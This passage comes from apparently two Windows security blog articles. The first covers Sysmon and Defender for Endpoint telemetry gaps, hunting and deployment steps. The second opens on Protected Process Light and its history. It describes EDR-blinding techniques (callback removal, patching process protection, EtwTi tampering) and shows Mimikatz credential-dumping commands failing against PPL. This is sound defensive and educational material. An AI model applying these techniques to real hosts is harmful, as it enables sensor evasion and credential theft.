This is the ceiling §8 quantified column-by-column. The Device* tables surface a normalized, mostly-complete cross-walk of Sysmon's manifest -- but mostly-complete is not the same as complete. The ProcessAccess GrantedAccess mask is the most-cited example: Sysmon EID 10 captures the full 32-bit PROCESS_ACCESS_MASK (which discriminates between PROCESS_QUERY_INFORMATION, PROCESS_VM_READ, PROCESS_CREATE_THREAD, and so on -- the canonical malicious patterns are visible in this mask), while MDE's DeviceEvents OpenProcessApiCall ActionType collapses the mask into a coarser categorization. The WmiEvent consumer expressions Sysmon EIDs 19-21 capture verbatim -- which are how WMI-based persistence is detected -- are not surfaced in the Device* schema at all. RawAccessRead (EID 9, the canonical disk-level credential-theft observable) is omitted. PipeEvent (EIDs 17-18) is omitted.
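
To make the GrantedAccess point concrete, the sketch below decodes a Sysmon EID 10 mask into named process access rights. The bit values are the standard process access rights from the Windows SDK; the table is a deliberately partial subset, `decodeGrantedAccess` is a hypothetical helper, and the sample mask 0x1410 is an illustrative value rather than a claim about any specific tool.

```javascript
// Process-specific access rights from the Windows SDK (partial subset).
const PROCESS_RIGHTS = [
  [0x0001, "PROCESS_TERMINATE"],
  [0x0002, "PROCESS_CREATE_THREAD"],
  [0x0008, "PROCESS_VM_OPERATION"],
  [0x0010, "PROCESS_VM_READ"],
  [0x0020, "PROCESS_VM_WRITE"],
  [0x0040, "PROCESS_DUP_HANDLE"],
  [0x0400, "PROCESS_QUERY_INFORMATION"],
  [0x1000, "PROCESS_QUERY_LIMITED_INFORMATION"],
];

// Decode a GrantedAccess string such as "0x1410".
// Bits not in the table are returned in `unknown` rather than guessed.
function decodeGrantedAccess(hex) {
  const mask = Number.parseInt(hex, 16);
  if (Number.isNaN(mask)) throw new TypeError(`not a hex mask: ${hex}`);
  const rights = [];
  let remaining = mask;
  for (const [bit, name] of PROCESS_RIGHTS) {
    if (mask & bit) {
      rights.push(name);
      remaining &= ~bit;
    }
  }
  return { rights, unknown: remaining >>> 0 };
}

console.log(decodeGrantedAccess("0x1410"));
```

A hunting rule written against the full mask can distinguish a read-only query from a handle that permits memory reads or thread creation, which is exactly the discrimination a coarser categorization loses.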

Hartong's sysmonconfig-mde-augment.xml exists precisely because of this asymmetry. The augment config is a community-curated artifact whose purpose is to fill the schema-truncation gap. The cost: a second telemetry stream on the host. The benefit: detection-engineering visibility into the verbose-EID surface MDE drops.

Ceiling 4: The kernel-mode adversary primitive

A ring-0 attacker with a working kernel primitive -- a memory-write capability into the kernel data structures, typically delivered via BYOVD against a vulnerable signed driver -- can defeat the pipeline as a consequence of defeating the structural defenses that protect it. Specifically:

Direct call to PsSetCreateProcessNotifyRoutineEx with Remove = TRUE unregisters the EDR sensor's callback, after which CreateProcess events on that host produce no observable.
A patch to the _EPROCESS.Protection field of MsSense.exe or Sysmon.exe strips the Antimalware-PPL gate, after which user-mode attacks against the service work again.
A direct write into the EtwTi provider's keyword mask zero-pages the security-event-emission surface, after which the kernel-side EtwTi consumer (which several EDRs subscribe to) sees no events even when the underlying behaviour fired.

The "Tampering with Windows Event Tracing" research published by Palantir in 2018 (Matt Graeber's canonical writeup) and the follow-on EtwTi-blinding tradition is the published primary for this attack class [@palantir-etw-tampering-2018]. The structural defenses are HVCI plus VBL plus Antimalware-PPL plus ELAM. But the four-component hardening stack does not prevent a kernel-mode adversary primitive from defeating the EDR; it only raises the bar to needing a kernel-mode adversary primitive.

Observation requires execution overhead, and execution requires the observer to live in the same trust domain as the observed. A kernel-mode observer (Sysmon, MDE) lives in the same kernel trust domain as the kernel-mode attacker; a hypervisor-rooted observer (`EtwTi` running under Virtualization-Based Security) shifts the trust boundary up one level, but does not eliminate it -- the observer-in-VBS is still subject to attacks on the hypervisor itself. There is no architectural place to put the observer that is strictly outside the attacker's reach unless the observer is in different hardware, which is what hardware-rooted Root-of-Trust attestations attempt and what an Anti-Tamper Service Provider (ATSP) is being defined for. EDR sensors will always be co-resident with the adversary at *some* trust boundary. The ceiling is structural.

Four ceilings, four sets of open questions. What is the field working on right now?

13. Open Problems and Active Work

Some questions in this article have no answer in 2026. Five of them are where the field will move next.

The MDE kernel-callback inventory

As §6's aha-moment Callout established, Microsoft has not published a kernel-callback inventory for the MDE EDR sensor, which is the structural reason Hartong's sysmonconfig-mde-augment.xml exists as a community-curated artifact rather than a Microsoft-published reference. What §13 adds is the empirical scaffolding the community uses in the absence of that inventory: the MITRE Engenuity Round 6 (2024) evaluation results [@ms-mitre-2024-blog] plus the Shen et al. whole-graph re-analysis [@arxiv-shen-2024] are the closest published evidence of which MDE detection paths produced an alert during a known emulated technique. Neither covers an end-to-end kernel-callback enumeration comparable to Sysmon's manifest -- they cover outputs (alerts produced) rather than mechanisms (callbacks registered). Closing this gap would require either Microsoft to publish a per-ActionType-to-per-kernel-callback cross-walk for the Device* schema, or the community to fund and publish a reverse-engineered inventory that goes meaningfully past the FalconForce 2022 and InfoGuard 2025 slices. As of 2026, neither has happened.

Defender XDR built-in detection rule logic

The AlertInfo and AlertEvidence table schemas are published; the underlying rule logic that produces alerts in these tables is not. Microsoft ships "Microsoft-authored detection rules" as part of Defender for Endpoint Plan 2, and the rules update continuously without an obvious public changelog. The community workaround is to subscribe to the MITRE ATT&CK evaluation rounds (the most recent being Round 6 in 2024 [@ms-mitre-2024-blog][@arxiv-shen-2024]) and infer rule coverage from per-technique detection scores, but this is indirect and lossy. A published rule-logic catalogue would let detection-engineering teams reason about which custom rules are duplicates of Microsoft's authored content and which fill genuine gaps.

Cross-tenant hunting and data sovereignty

MSSPs (managed-security service providers) routinely need to hunt across multiple customer tenants for shared-IOC observations. Microsoft's official multi-tenant story is Microsoft Defender XDR Multitenant Management (in GA) plus Azure Lighthouse for cross-tenant Sentinel access. Both are functional and both are documented at the operational level. The deeper question -- what is the GDPR/HIPAA/FedRAMP framework around hunting an IOC observed in Tenant A against telemetry held in Tenant B's regional Kusto cluster? -- is unsettled. The data-residency commitments Microsoft makes per region [@ms-server-endpoints-learn] do not directly answer the cross-tenant-hunt question. Vendor and customer guidance is still maturing.

A Microsoft-published reference MDE-augmentation Sysmon config

Hartong's config is the community answer to the question "what Sysmon EIDs should I emit on a host that already has MDE?" There is no Microsoft-published reference equivalent. This is the most surgical near-term improvement Microsoft could make. Publishing such a config -- even as a starting-point template, not a binding recommendation -- would compress an entire detection-engineering conversation into a single endorsed artifact. The political reason it has not happened is partly that Microsoft does not officially recommend running Sysmon alongside MDE; the operational reality is that detection-engineering-mature shops do anyway.

Cross-platform parity

Sysmon for Linux (microsoft/SysmonForLinux, created October 28, 2020 and publicly announced in October 2021) ships an eBPF-based implementation of the same XML schema and emits to syslog [@github-sysmon-linux]. It covers a substantial subset of the Windows manifest -- process create, file write, network connect, image load, raw access read -- and it shares the XML rule grammar across operating systems, so a detection-engineering team can write one Sigma-aligned rule and run it against both Windows and Linux endpoints with minor token substitutions. Full parity between the Windows kernel-callback Sysmon and the Linux eBPF Sysmon is not the design intent; the Linux port intentionally captures only the EIDs that map cleanly onto eBPF observables. BTFHub plus SysinternalsEBPF (the in-tree CO-RE infrastructure the Linux port uses) make per-kernel-version deployments tractable, but the field has not yet converged on a single canonical Linux config the way it converged on SwiftOnSecurity for Windows.

These five open problems are where the field will move in the next five years. In the meantime, what does the analyst do on Monday morning?

14. Seven Things to Do Monday Morning

Everything above has been background. Here is the operational checklist. Each step is anchored to a primary citation. Walk all seven on a single non-production host before fleet rollout; the ninety-second triage walk from §1 is best learned by reproducing it once on your own tenant.

1. Verify the MDE sensor service is healthy

Run as Administrator on the endpoint:

sc query sense

A healthy result shows STATE: 4 RUNNING and WIN32_EXIT_CODE: 0. If the result is STATE: 1 STOPPED or the service is missing entirely, consult the WDATPOnboarding event source in the Application event log for events 5, 10, 15, 30, 35, 40, 65, and 70 -- each has a documented resolution procedure [@sense-troubleshoot]. On Windows Server 2019, 2022, 2025, or Azure Stack HCI 23H2 or later, also verify the Feature on Demand is installed:

DISM.EXE /Online /Get-CapabilityInfo /CapabilityName:Microsoft.Windows.Sense.Client~~~~

The result should show State : Installed and Version : 10.x.x.x. If State : NotPresent, install the FoD before proceeding.
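The health check in step 1 is easy to script once the `sc query sense` output has been captured as text. The following is a minimal sketch, not a supported tool: the function names `parseScQuery` and `isSenseHealthy` are hypothetical, and the sample output is hand-written in the usual `sc query` layout rather than captured from a real host.

```javascript
// Sketch: parse captured `sc query sense` text and apply the step 1 criteria
// (STATE 4 RUNNING and WIN32_EXIT_CODE 0). Function names are hypothetical.
function parseScQuery(text) {
  const state = /^\s*STATE\s*:\s*(\d+)\s+(\w+)/m.exec(text);
  const exit = /^\s*WIN32_EXIT_CODE\s*:\s*(\d+)/m.exec(text);
  return {
    stateCode: state ? Number(state[1]) : null,
    stateName: state ? state[2] : null,
    win32ExitCode: exit ? Number(exit[1]) : null,
  };
}

function isSenseHealthy(text) {
  const r = parseScQuery(text);
  return r.stateCode === 4 && r.stateName === 'RUNNING' && r.win32ExitCode === 0;
}

// Hand-written sample in the usual `sc query` layout (an assumption, not a capture).
const sampleRunning = [
  'SERVICE_NAME: sense',
  '        TYPE               : 10  WIN32_OWN_PROCESS',
  '        STATE              : 4  RUNNING',
  '                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)',
  '        WIN32_EXIT_CODE    : 0  (0x0)',
  '        SERVICE_EXIT_CODE  : 0  (0x0)',
].join('\n');

const sampleStopped = sampleRunning.replace('4  RUNNING', '1  STOPPED');

console.log('running sample healthy:', isSenseHealthy(sampleRunning));
console.log('stopped sample healthy:', isSenseHealthy(sampleStopped));
```

A missing service produces no `STATE` line at all, so the parser returns `null` fields and the health check fails closed.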

2. Open Advanced Hunting and run the §8 query

Navigate to defender.microsoft.com (or the legacy security.microsoft.com), expand Hunting > Advanced hunting, paste the §8 KQL query, and run it [@advanced-hunting-overview]. On a fresh tenant the query may return zero rows -- that is the correct result for a healthy environment. Tighten the time window if it is slow (Timestamp > ago(1h) instead of ago(24h)) until the query returns within ten seconds. The point of this step is to confirm the read surface is reachable and that the user has Hunter (or higher) RBAC permission on the tenant.

3. If licensed for Sentinel, install the Defender XDR connector

In the Microsoft Sentinel workspace, navigate to Data connectors, choose Microsoft Defender XDR, and configure per-table streaming [@sentinel-xdr-connector]. Pick the tables your team needs longer retention or analytics-rule scheduling on; leave the others to in-portal Advanced Hunting. Be aware that enabling the connector "automatically disconnects" any legacy Microsoft Defender component connectors during enablement; this is the cleanup detail to plan for during migration windows [@sentinel-xdr-connector].

4. If deploying Sysmon alongside MDE, start from the augment config

Clone olafhartong/sysmon-modular, build the sysmonconfig-mde-augment.xml variant, and deploy with:

Sysmon64.exe -accepteula -i sysmonconfig-mde-augment.xml

Verify the active configuration with Sysmon64.exe -c and confirm the rule count matches the augment config's expected output [@github-hartong-modular].

5. If deploying Sysmon standalone, start from NextronSystems or modular default

For air-gapped or unlicensed environments, clone NextronSystems/sysmon-config (the post-2021-rename successor to Neo23x0/sysmon-config) and deploy sysmonconfig.xml or, for the blocking-rule variant, sysmonconfig-export-block.xml [@github-neo23x0][@github-nextronsystems-meta]. Alternatively, olafhartong/sysmon-modular's default sysmonconfig.xml (built from the modular library) is the right choice if you want fine-grained per-technique tuning later [@github-hartong-modular].

6. Verify Sysmon v15.2 or later is running

Sysmon64.exe -c

The output's header line should show the binary version. Anything v15.x or later has the protected-process gate enabled [@sysmon-ms-learn][@bleepingcomputer-sysmon15]. Anything older is trivially blindable by a SYSTEM-privilege attacker and is the single biggest deployment-hygiene risk in the Sysmon population today.
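For a fleet-wide check, the version comparison can be automated against collected banner text. This is a sketch under stated assumptions: the banner string format (`System Monitor vMAJOR.MINOR - ...`) is assumed rather than taken from the cited documentation, the version components are compared numerically, and the helper names are hypothetical.

```javascript
// Sketch: pull the version out of a Sysmon banner line and compare it to a
// minimum. The banner format is an assumption; helper names are hypothetical.
function parseSysmonVersion(banner) {
  const m = /v(\d+)\.(\d+)/.exec(banner);
  return m ? { major: Number(m[1]), minor: Number(m[2]) } : null;
}

// Components are compared as integers: major first, then minor.
function atLeast(version, minMajor, minMinor) {
  if (!version) return false; // unparseable banner: treat as failing
  if (version.major !== minMajor) return version.major > minMajor;
  return version.minor >= minMinor;
}

const banners = [
  'System Monitor v15.15 - System activity monitor',
  'System Monitor v13.33 - System activity monitor',
];

for (const banner of banners) {
  const version = parseSysmonVersion(banner);
  // 15.0 is the threshold for the protected-process gate described above.
  console.log(banner, '->', atLeast(version, 15, 0) ? 'OK' : 'UPGRADE');
}
```

The minimum is a parameter, so the same helper serves whichever floor the team settles on.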

7. Audit the MDE onboarding registry hives

Compare the live registry values to the expected onboarding state:

reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection"
reg query "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status"

Unexpected changes -- particularly a change to the onboarding OrgId or to the policy-controlled Disabled value -- are an indicator that the tenant or device has been re-targeted, possibly by an attacker who obtained admin-level access and is attempting to re-route the endpoint's telemetry to a different tenant or to disable the MDE sensor entirely [@sense-troubleshoot]. Set up a Sentinel detection rule on DeviceRegistryEvents with RegistryKey contains "Windows Advanced Threat Protection" to surface this class of tampering automatically.
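The comparison against the expected onboarding state can be sketched as a diff between a recorded baseline and a fresh `reg query` capture. The parser below assumes the usual four-space-delimited `reg query` text layout; the function names are hypothetical, and the sample value data (including the `OrgId` GUIDs) is made up for illustration.

```javascript
// Sketch: parse `reg query` text into a name -> {type, data} map and diff it
// against a baseline. Assumes the four-space-delimited layout; names are hypothetical.
function parseRegQuery(text) {
  const values = {};
  for (const line of text.split(/\r?\n/)) {
    const m = /^\s{4}(.+?)\s{4}(REG_\w+)\s{4}(.*)$/.exec(line);
    if (m) values[m[1]] = { type: m[2], data: m[3] };
  }
  return values;
}

function diffAgainstBaseline(baseline, live) {
  const changes = [];
  const names = new Set([...Object.keys(baseline), ...Object.keys(live)]);
  for (const name of names) {
    const before = baseline[name] ? baseline[name].data : undefined;
    const after = live[name] ? live[name].data : undefined;
    if (before !== after) changes.push({ name, before, after });
  }
  return changes;
}

// Made-up sample data: the GUIDs below are placeholders, not real tenant IDs.
const baselineText = [
  'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Advanced Threat Protection\\Status',
  '    OnboardingState    REG_DWORD    0x1',
  '    OrgId    REG_SZ    00000000-0000-0000-0000-000000000001',
].join('\n');
const liveText = baselineText.replace('000000000001', '000000000002');

const changes = diffAgainstBaseline(parseRegQuery(baselineText), parseRegQuery(liveText));
console.log(changes);
```

Any non-empty result is worth a look; a changed `OrgId` is the re-targeting case described above.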

Note: Walk steps 1 and 2 on a single non-production host before fleet rollout. The ninety-second-triage walk you saw in §1 is best learned by reproducing it once on your own tenant. The cost of getting steps 4-6 wrong (deploying the wrong Sysmon config on a high-volume server fleet) is hours of operational pain; the cost of doing them right on a single test host first is twenty minutes.

The MDE sensor service has not been onboarded on this host. Two common causes: (1) the endpoint is on a Windows Server SKU and the SENSE Feature on Demand has not been installed; run the DISM `Get-CapabilityInfo` check in step 1 to confirm. (2) The onboarding script (the `WindowsDefenderATPLocalOnboardingScript.cmd` or the equivalent Group Policy / Intune / SCCM artifact) has not been run on this host. The MDE settings page in the Defender XDR portal shows the per-device onboarding artifacts under **Settings > Endpoints > Onboarding** for download [@sense-troubleshoot].

The Defender XDR portal also exposes a device timeline view that surfaces a chronological event stream per device without requiring KQL. This is the right view for analysts who are still learning the schema; the KQL surface is the right view for repeatable hunts and detection-rule authoring.

Seven steps, one Monday. The rest of the questions are in the FAQ.

15. Frequently Asked Questions

Seven of the questions that come up every time this material is taught.

Yes on its output side; mostly no on its input side. Sysmon publishes its events through an ETW provider called `Microsoft-Windows-Sysmon`, which is how downstream collectors and the Windows Event Log service consume the data. On its *input* side, Sysmon is a kernel driver that collects via six different mechanisms -- `PsSetCreateProcessNotifyRoutineEx` for process create and exit, `PsSetLoadImageNotifyRoutine` for image load and driver load, `PsSetCreateThreadNotifyRoutineEx` for remote-thread creation, `ObRegisterCallbacks` for cross-process access, `CmRegisterCallbackEx` for registry, and Filter Manager minifilters for ordinary file system and NPFS named pipes. Two exceptions live on Sysmon's input side. The single kernel-ETW consumer is `Microsoft-Windows-DNS-Client` for EID 22 DNSEvent; the WmiEvent family (EIDs 19-21) is implemented in a consumer style against the WMI activity provider's user-mode tracing surface. Calling Sysmon "ETW-based" without that distinction is the most common architectural confusion in the field [@sysmon-ms-learn].

For most organizations licensed for MDE Plan 2 and without a mature detection-engineering team, yes -- MDE alone is the right baseline. For organizations with a detection-engineering team, the community pattern is to deploy MDE *plus* a tuned Sysmon configuration (specifically Olaf Hartong's `sysmonconfig-mde-augment.xml`) that fills the gaps where MDE's `Device*` schema truncates or omits fields that Sysmon's manifest captures verbatim -- the `ProcessAccess` GrantedAccess mask, the full WMI consumer expressions, RawAccessRead, the pipe events, and selected file-delete archival paths. The wrong answer for an MDE-licensed shop with a detection-engineering team is to do nothing on the Sysmon side; the second-wrong answer is to deploy *default* Sysmon alongside MDE, which produces double the telemetry volume for the coverage of one [@github-hartong-modular][@mde-ms-learn].

The five class-specific `Device*` tables (`DeviceProcessEvents`, `DeviceNetworkEvents`, `DeviceFileEvents`, `DeviceImageLoadEvents`, `DeviceRegistryEvents`) each map onto a single Sysmon EID family and present a normalized, per-class set of columns. `DeviceEvents` is the miscellaneous catch-all: AMSI scan results, exploit-protection events, Defender Antivirus operational events, Attack Surface Reduction rule fires, Network Protection blocks, OpenProcess API calls, and other MDE-specific telemetry surface here under different `ActionType` values. If a row's `ActionType` does not match what you expected, the row is probably in `DeviceEvents` rather than the table you searched first [@advanced-hunting-overview].

No. The historical root is SwiftOnSecurity's `sysmon-config`, created on February 1, 2017 per the GitHub REST API [@github-swiftonsecurity-meta]. Florian Roth (`@Neo23x0`) forked SwiftOnSecurity's repository in January 2018 and added blocking-rule support, community pull-request merges, and the maintainer roster that now includes Tobias Michalski, Christian Burkard, and Nasreddine Bencherchali [@github-neo23x0]. The Neo23x0 repository was renamed to `NextronSystems/sysmon-config` on July 24, 2021 [@github-nextronsystems-meta]; the old URL HTTP-301 redirects to the new one and the content lineage from SwiftOnSecurity is unchanged. Calling Roth's config "the original" is the inverse of the truth; calling it "the canonical actively-maintained fork" is closer.

No. Sysmon supports one active configuration at a time. There is no aggregate-multiple-XMLs feature at the driver layer. Olaf Hartong's modular workflow generates a single merged XML at build time from a per-technique module library; the production fleet receives that single XML and the driver enforces it. If you want two configurations -- one for the SOC team's hunting, one for the platform team's audit -- merge the rules at build time and ship the combined product [@github-hartong-modular].

Because `MsSense.exe` runs as Antimalware Protected Process Light (`PROTECTED_ANTIMALWARE_LIGHT`), the Windows kernel rejects ordinary user-mode `OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_DUP_HANDLE)` requests against the process from any caller that does not itself run at an equal or higher signer level. The published reverse-engineering technique (FalconForce 2022) is to raise the Windows PE debug server `dbgsrv.exe` to the `WinTcb` signer level via a PPLKiller-class kernel primitive, then attach the elevated debug server to `MsSense.exe`. That technique requires a kernel-mode primitive (commonly a BYOVD chain), which is itself non-trivial. The protection level is the structural defense; the debug-server technique is the dispositive community workaround [@falconforce-2022].

Thirty days of raw data in the Defender XDR portal: "*Advanced hunting is a query-based threat hunting tool that you use to explore up to 30 days of raw data*" [@advanced-hunting-overview]. Beyond thirty days, retention is configurable per workspace via the Microsoft Sentinel Defender XDR connector; the Log Analytics workspace archive tier supports up to twelve years of per-table archive on a per-GB-billed basis [@sentinel-xdr-connector][@ms-log-analytics-archive]. The two surfaces are not exclusive; the common operational pattern is in-portal for the hunting team (30 days, no per-GB cost) plus per-table Sentinel streaming for the analytics-rules team (extended retention, per-GB cost on selected tables).

These are the questions. The seven layers between Maya's cmd.exe at 9:14 a.m. and her Kusto row at 9:14:03 are how the answers actually work -- a kernel callback, a user-mode aggregator, an ETW publisher or TLS-pinned cloud forwarder, a regional Kusto ingest, a table write, and a KQL read, with two structural defenses (Antimalware-PPL and the Sysmon v15 protected-process gate) keeping each layer honest. Every other detection-engineering pattern in the Windows field is a configuration of those seven layers, and most of the open problems are at the seams between them.

See also. The Sysmon driver's collection layer leans on the kernel-callback APIs documented in the Windows process mitigations and Object Manager namespace articles in this series. The ETW transport bus that Sysmon publishes onto -- and that EtwTi security events surface through -- is the subject of the dedicated ETW article in this series; the article goes deeper on provider GUIDs, manifests, and the eight-trace-session manifest-provider cap that bounds Sysmon's coexistence story in §10. The AMSI primary path that produces DeviceEvents ActionType = "AmsiScriptDetection" is the subject of the AMSI article; the two pipelines are siblings, not substitutes. And the Sigma rule corpus that compiles down into KQL for Defender XDR / Sentinel hunting is the same Sigma corpus that compiles into Splunk SPL and Elastic EQL -- the vendor-neutral query layer that sits above this article's KQL surface [@github-sigma].

Protected Process Light: When the Administrator Isn't Enough

noreply@paragmali.com (Parag Mali) — Tue, 12 May 2026 00:00:00 GMT

**Windows Protected Process Light (PPL) re-asks the question of who can touch whom one level below the token model.** A single byte in `EPROCESS` packs a process's protection type, audit bit, and signer rung; the kernel's lattice check inside `NtOpenProcess` rejects memory-read attempts from below the target's rung even when the caller is SYSTEM with `SeDebugPrivilege` enabled. Every public bypass since 2018 lives in one structural class -- the kernel verifies the channel by which code enters a PPL, not the behaviour of that code once mapped -- which is why Microsoft classifies PPL as defense in depth rather than a security boundary, and why Credential Guard / `LsaIso.exe` is its necessary VBS-anchored companion.

1. Mimikatz on a Protected Box

A red team operator has done everything right. The shell is SYSTEM-integrity. SeDebugPrivilege is enabled in the token. whoami /priv shows every privilege Windows defines. The operator types mimikatz.exe, then privilege::debug -- OK. Then sekurlsa::logonpasswords -- and Mimikatz answers:

ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory : (0x00000005) Access is denied

The mechanism that just denied them is not a privilege check at all. It is not an ACL decision. It is not the integrity-level mediator. itm4n recreated exactly this failure in 2021 against a vanilla Windows install with one registry value set [@itm4n-runasppl]. The error code 0x00000005 is ERROR_ACCESS_DENIED -- the Win32 surface that GetLastError exposes for the kernel's NTSTATUS STATUS_ACCESS_DENIED = 0xC0000022. The kernel returns the NTSTATUS out of NtOpenProcess before the security descriptor of lsass.exe has been consulted; RtlNtStatusToDosError then maps it to the Win32 0x5 that surfaces in kuhl_m_sekurlsa.c.

Protected Process Light (PPL): A kernel-enforced gating model that decorates a process with a *protection level* -- a structured byte combining a type field, an audit bit, and a signer rung -- and rejects `OpenProcess` requests from callers whose protection level is below the target's, regardless of token privileges or security-descriptor ACLs.

Picture the scenario concretely. A 2026 red-team engagement against a hardened Windows 11 24H2 endpoint. RunAsPPL audit-mode is on by default after the Windows 11 22H2 rollout extended audit-default to consumer SKUs [@learn-runasppl]. A third-party EDR daemon is already running, signed at the Antimalware rung via the vendor's Microsoft Virus Initiative enrollment. The operator owns local administrator. The operator has SYSTEM. The operator holds every privilege Windows defines. They still cannot read a single byte of LSASS memory.

The denial trace, walked carefully, looks like this. Mimikatz calls OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, lsass_pid). The Win32 thunk lands on NtOpenProcess, which dispatches to the object-manager callback PspProcessOpen. That callback calls PspCheckForInvalidAccessByProtection, which calls RtlTestProtectedAccess against the caller's EPROCESS.Protection byte and the target's EPROCESS.Protection byte. The lattice test fails. The kernel strips PROCESS_VM_READ from the requested mask. With the surviving limited mask, the request continues into SeAccessCheck, but Mimikatz never wanted the limited mask; it wanted to read memory. The handle returned (or the failure path taken) gives Mimikatz exactly the path that produces 0x00000005 in kuhl_m_sekurlsa.c. The relevant commit is fe4e98405589e96ed6de5e05ce3c872f8108c0a0, cited by itm4n as the source for the exact failure path that yields 0x00000005 [@mimikatz-sekurlsa].

sequenceDiagram
participant Mim as Mimikatz (SYSTEM, SeDebugPrivilege)
participant K32 as kernel32 / OpenProcess
participant NtOP as NtOpenProcess
participant PsPO as PspProcessOpen
participant CHK as PspCheckForInvalidAccessByProtection
participant Lat as RtlTestProtectedAccess
participant SAC as SeAccessCheck

Mim->>K32: OpenProcess(PROCESS_VM_READ, lsass)
K32->>NtOP: syscall NtOpenProcess
NtOP->>PsPO: object-manager callback
PsPO->>CHK: check caller.Protection vs target.Protection
CHK->>Lat: lattice rule (signer rungs)
Lat-->>CHK: full mask denied
CHK-->>PsPO: strip PROCESS_VM_READ
PsPO->>SAC: residual mask (limited only)
SAC-->>NtOP: limited handle (read denied)
NtOP-->>Mim: STATUS_ACCESS_DENIED (NTSTATUS 0xC0000022, Win32 GetLastError = 5)

Note: If every privilege Windows defines is held by the caller, what is doing the denying? The answer is a kernel structure that the token model does not see and the security descriptor does not influence -- a byte in EPROCESS named Protection, mediating a lattice the access check consults before it ever asks SeAccessCheck about privileges.

This is not a workaround pattern. It is a new dimension. The token model is unchanged. The integrity level is unchanged. The security descriptor on lsass.exe is unchanged. What changed is that the kernel now answers a question it did not ask before: what kind of trust does the caller have to manipulate the address space of the callee?

PPL re-asks the question of who can touch whom one level below the token model.

That mechanism has a name (Protected Process Light), an encoding (a single UCHAR), and a history that does not begin where you would expect. To understand the byte, we have to understand why Microsoft built it in the first place. The next section starts where the history starts: a 2006 Microsoft whitepaper about Hollywood.

2. Historical Origins -- Vista, DRM, and the First Protected Process

The kernel mechanism that today denies admins access to LSASS was invented in 2006 to keep Hollywood happy. The cover page of Microsoft's process_vista.doc whitepaper opens with a sentence almost no one quotes today:

The Microsoft Windows Vista operating system introduces a new type of process known as a protected process to enhance support for Digital Rights Management functionality in Windows Vista.

The whitepaper was published November 27, 2006, two months before Vista's GA, and it is the architectural seed of the byte we will be staring at for the rest of this article [@vista-process-doc]. The motivation was not credential theft. It was HD-DVD and Blu-ray content protection. Studio licensing agreements required that even an administrator on the local machine could not read the audio device graph isolation host's memory while protected content was playing. The Protected Media Path required a kernel-enforced barrier between admin user-mode and the media pipeline.

Protected Media Path (PMP): The Vista-era set of components that decrypt and render high-definition video and audio content under DRM. PMP requires kernel-enforced isolation of `audiodg.exe` and a small set of related processes so that local administrators cannot dump intermediate content keys from process memory.

The Vista design was minimal. A single bit in EPROCESS marks a process as protected. At NtCreateUserProcess, the kernel parses the main image's Authenticode signature and looks for a specific Microsoft EKU OID that only the PMP signing root can issue [@forshaw-2018-10]. If the EKU is present and the chain resolves to that root, the kernel flips the bit. On every subsequent NtOpenProcess against that process, the kernel strips a fixed set of access rights from the mask, no matter who is asking.

Alex Ionescu, then a Windows internals researcher and now CrowdStrike's Chief Technology Innovation Officer, enumerated the denials in 2007 [@ionescu-pp-bad-idea]:

A typical process cannot perform operations such as the following on a protected process: Inject a thread into a protected process; Access the virtual memory of a protected process; Debug an active protected process; Duplicate a handle from a protected process; Change the quota or working set of a protected process.

Five denials. One bit. One certificate root. Ionescu's same essay, titled "Why Protected Processes Are A Bad Idea," made a structural argument that aged well: putting a DRM mechanism in the kernel is a category error. The mechanism is too narrow for non-DRM use because the only certificate accepted is Microsoft's PMP signing root, and the only operations gated are the ones Hollywood cared about. Third parties cannot opt in, and Microsoft itself cannot graduate the level of trust. Ionescu's 2007 critique remains worth reading on its own merits. The argument that DRM-shaped kernel features tend to be reused for security mitigations and that this reuse changes their threat-model semantics is exactly what plays out over the next seven years [@ionescu-pp-bad-idea].

The seven-year pause is its own story. Vista shipped, Vista was followed by Windows 7, and Windows 7 was followed by Windows 8 -- and through all of it, the access-check primitive that protects audiodg.exe from administrators remained a DRM artefact. The primitive existed; the graduated trust dimension did not. Two parallel failures pushed Microsoft toward widening the encoding.

The first was Mimikatz. Benjamin Delpy's tool was first released in May 2011 and refined through 2013 [@mimikatz-wikipedia]; it made it trivial for an administrator to extract NTLM hashes and Kerberos session keys from lsass.exe. The countermeasure of restricting SeDebugPrivilege was useless; an attacker who has SYSTEM has every privilege. What Mimikatz exploited was a primitive gap: the kernel had no way to say "lsass is protected against administrators but reachable from privileged Microsoft services."

The second was Mateusz Jurczyk's CSRSS jailbreak of Windows 8 RT in 2013. Jurczyk (who writes as j00ru) catalogued more than seventy Win32k system calls that the kernel guarded with the pattern if (PsGetCurrentProcess() != gpepCsrss) return STATUS_ACCESS_DENIED; [@j00ru-1393]. That gating mechanism worked only as long as nobody could inject code into csrss.exe. On Windows 8 RT, an attacker who could inject into csrss.exe could bypass Microsoft's locked-down Surface RT shell. Ionescu later observed that "In Windows 8.1 RT, this jailbreak is 'fixed', by virtue that code can no longer be injected into Csrss.exe for the attack" [@ionescu-part2]. The fix made csrss.exe a PPL at the WinTcb rung, and the same machinery was generalised to lsass.exe and the Antimalware tier.

Note: Mimikatz proved Microsoft needed a graduated trust dimension for lsass.exe. The j00ru CSRSS jailbreak proved Microsoft needed it for csrss.exe too. The same widening of the encoding answered both.

flowchart LR
    subgraph Vista2006[Vista 2006 -- single bit]
        V1[EPROCESS protected = 0 or 1]
        V2[Certificate root: PMP only]
        V3[Access denials: hardcoded 5-tuple]
    end
    subgraph Win81[Windows 8.1 -- _PS_PROTECTION byte]
        W1[Type: 3 bits]
        W2[Audit: 1 bit]
        W3[Signer rung: 4 bits]
        W4[Certificate roots: per-EKU sub-OIDs]
        W5[Access denials: lattice over signer]
    end
    V1 --> W1
    V2 --> W4
    V3 --> W5

The DRM-to-credentials repurposing is not unique to PPL. The same pattern shows up in HVCI (originally a Hyper-V kernel-mode integrity feature, later repurposed for general code-integrity enforcement) and in Trustlets (originally an enterprise feature for Credential Guard, later generalised). Kernel mechanisms born in one threat model rarely stay confined to it.

Microsoft already had the access-check primitive. What it didn't have, in 2007, was a way to ask "how much trust does this process carry?" The fix would not arrive until Windows 8.1 in October 2013, and when it arrived, it would fit in a single byte.

3. `_PS_PROTECTION` -- The Single-Byte Encoding

